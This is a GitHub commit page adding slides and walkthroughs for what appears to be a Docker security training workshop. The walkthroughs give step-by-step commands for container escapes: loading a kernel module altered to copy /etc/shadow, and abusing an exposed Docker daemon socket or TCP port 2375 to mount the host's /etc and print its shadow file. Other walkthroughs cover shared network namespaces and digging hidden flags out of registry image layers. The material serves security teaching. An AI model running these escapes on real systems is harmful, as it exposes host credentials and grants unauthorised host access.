Skip to content

Commit

Permalink
Adds slides and brief walkthrough
Browse files Browse the repository at this point in the history
  • Loading branch information
Mohit Gupta committed Oct 18, 2019
1 parent 0e70ea7 commit 92756e3
Show file tree
Hide file tree
Showing 5 changed files with 92 additions and 0 deletions.
Binary file added docker_security_workshop F-Secure branding.pdf
Binary file not shown.
24 changes: 24 additions & 0 deletions roles/capabilities/files/walkthrough.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
1) Get the container id for the kernel container so we can add files:

docker ps | grep kernel

The container id will be the first field

2) Tweak exploit.c by replacing '/bin/echo foo > /bar' with '/bin/cp /etc/shadow /tmp/'

3) Copy over exploit.c and Makefile to the container

docker cp exploit.c <container id>:/
docker cp Makefile <container id>:/

4) Exec into the container

docker-compose exec kernel bash

5) Compile module

make

6) Load module

insmod exploit.ko
19 changes: 19 additions & 0 deletions roles/daemon/files/walkthrough.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
1) Exec into the backdoor container

docker-compose exec backdoor sh

2) Access the daemon within the UNIX socket in / and list running containers

docker -H unix:///docker.sock ps

3) Obtain the IP address of the containers gateway (the host)

route -n

4) Access the daemon through the host on TCP 2375

docker -H tcp://<host ip>:2375 ps

5) Print /etc/shadow from the host

docker -H unix:///docker.sock run --rm -v /etc:/host/ ubuntu cat /host/shadow
21 changes: 21 additions & 0 deletions roles/networking/files/walkthrough.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
1) Spawn an initial container

docker run --rm -ti skybound/net-utils bash

2) In a _separate_ terminal, obtain the container id of the container created within step 1

docker ps

3) Spawn a second container that attaches onto the network stack of the first container

docker run --rm -ti --net container:<container id> skybound/net-utils bash

4) Spawn a netcat listener in the first container

nc -nlvp 8080

5) Connect to the listening netcat from the second container

nc -v localhost 8080

6) Type random gibberish and press enter in both terminals, and validate the data appears in the other terminal
28 changes: 28 additions & 0 deletions roles/registry/files/walkthrough.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
1) List available tags

reg ls -f localhost:5000

2) Obtain the manifest of the first image and get the digest of the config

reg manifest -f localhost:5000/supersecretimage:v1

3) Download the config and observe that a file was added to /lib/udev/docker.txt within the last layer

reg layer -f localhost:5000/supersecretimage@<config digest from manifest> | jq

4) Get the digest of the bottom layer from the manifest

5) Download the bottom layer

reg layer -f localhost:5000/supersecretimage@<layer digest from manifest> > layer.tar.gz

6) Extract layer and cat lib/udev/docker.txt

tar zxvf layer.tar.gz && cat lib/udev/docker.txt


7) For the second image, the same steps can be followed to get to the config which contains the flag

8) For the final flag, the config shows a file was added in the second to last layer and then deleted in the final, as such obtain the digest of the second from bottom layer from the manifest

9) Download the layer as before, extract and view the contents of bin/something.txt

0 comments on commit 92756e3

Please sign in to comment.